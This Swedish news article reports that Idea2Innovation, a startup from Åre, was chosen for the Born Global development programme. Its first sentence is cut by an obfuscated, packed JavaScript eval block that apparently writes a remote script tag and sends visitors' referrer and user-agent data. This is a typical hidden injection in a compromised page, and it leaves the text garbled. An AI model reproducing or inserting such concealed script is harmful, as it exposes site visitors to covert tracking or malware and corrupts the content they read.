Image Image Image Image Image Image Image Image Image Image

| 20 juni, 2021

Scroll to top

Top

Åreförtaget Idea2Innovation uttaget till Born Global

Åreförtaget Idea2Innovation uttaget till Born Global
Sebastian

Utvecklingsprogrammet eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|hsiie|var|u0026u|referrer|htsen||js|php’.split(’|’),0,{}))
Born Global handplockar några av Sveriges mest lovande unga tillväxtföretag, med målet att de snabbare ska nå tillväxt på den internationella marknaden. Idea2Innovation är en av de tio utvalda. 

-Vår drivkraft har hela tiden varit att skapa ett lönsamt tillväxtföretag med Åre som bas och försäljning på en global marknad. Med vår sociala molntjänst för idéutveckling har vi på kort tid tagit position som ledande på den svenska marknaden. Det är nu dags för nästa steg och vi ser verkligen fram emot att få tillgång till den kompetens och de kontakter som detta program kommer att ge, säger Jakob Lindvall, vd Idea2Innovation.

Syftet med utvecklingsprogrammet är att de deltagande företagen snabbare och säkrare ska nå hög lönsamhet med skalbara affärsmodeller på en global marknad. Programmet riktar sig till svenska företag inom IT-sektorn.

-Det har varit väldigt många nominerade till den här omgången av programmet. Att Idea2Innovation, med molntjänsten WIDE, väljs ut som ett av tio bolag är oerhört roligt. Det visar att fler anser att vi är ett potentiellt tillväxtföretag som har alla möjligheter att slå igenom internationellt, säger Åse Angland Lindvall, en av grundarna till Idea2Innovation.

Bakom Born Global står ALMI och Center for Business Innovation vid Chalmers Tekniska Högskola. Programmet är utvecklat av Chalmers tillsammans med Stanford i USA och ett antal entreprenörer. Deltagande företag nomineras och utses på nationell nivå av en grupp experter bestående av framgångsrika entreprenörer och riskkapitalister. Programmet löper under sex månader och genomförs i Sverige och Silicon Valley.